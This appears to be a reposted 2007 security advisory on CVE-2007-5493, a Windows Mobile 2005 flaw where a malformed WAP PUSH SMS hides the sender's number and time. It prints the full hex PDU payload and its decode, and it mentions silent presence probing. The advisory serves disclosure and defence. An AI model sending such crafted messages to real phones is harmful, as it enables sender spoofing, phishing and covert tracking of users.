|
|
|
|
| |
Credit:
The information has been provided by Ollie Whitehouse.
The original article can be found at: http://www.securityfocus.com/bid/26019
|
| |
Symantec discovered that a slightly malformed WAP PUSH message could be used to hide the originating sender of the message on Windows Mobile 2005. The original PDU can be seen in [1]. The following PDU will cause the Pocket PC Phone edition SMS handler to incorrectly decode the PDU. The result of which is both the sending telephone number and the sending time are incorrect.
[1] PDU (Line wrapped)
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101
The decode of the PDU can be seen in [2]. This decode was achieved with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message is received by a SmartPhone it will be silently discarded, which can also be useful to an attacker who wishes to ascertain if a cellphone is on without alerting the user through SMS delivery receipts.
[2] Decode of PDU from PDUSpy
PDU LENGTH IS 118 BYTES
ADDRESS OF DELIVERING SMSC
NUMBER IS : +447785016005
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
MESSAGE HEADER FLAGS
MESSAGE TYPE : SMS SUBMIT
REJECT DUPLICATES : NO
VALIDITY PERIOD : RELATIVE
REPLY PATH : NO
USER DATA HEADER : PRESENT
REQ. STATUS REPORT : NO
MSG REFERENCE NR. : 34 (0x22)
DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific
DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data
VALIDITY OF MESSAGE : 24.0 hrs
USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH : 6 octets
UDH : 05 04 0B 84 23 F0
UDH ELEMENTS : 05 - Appl. port addressing 16bit
4 (0x04) Bytes Information Element
09200 : SOURCE port is: allocated by IANA
02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0
USER DATA (TEXT) : % jE
symantec Symantec
bulkSMS (Unregistered Ver) -
LogixMobile.com
Vendor Response:
A vulnerability has been discovered in the SMS handler. If a malicious message with no sender was received by a user on their device, the user may be enticed in taking action or clicking the URI that could lead to a second order attack.
Mitigating Factors: By default Windows mobile device policy require SI messages to be authenticated. The Mobile Operators have the ability to change the policy to not requiring authentication in order for 3rd party ring tones and other SI messages.
Microsoft will look into a different architecture in future versions.
Recommendation:
Contact your mobile operator to ensure the proper policy is set on your device.
CVE Information:
CVE-2007-5493
|
|
|
|
|
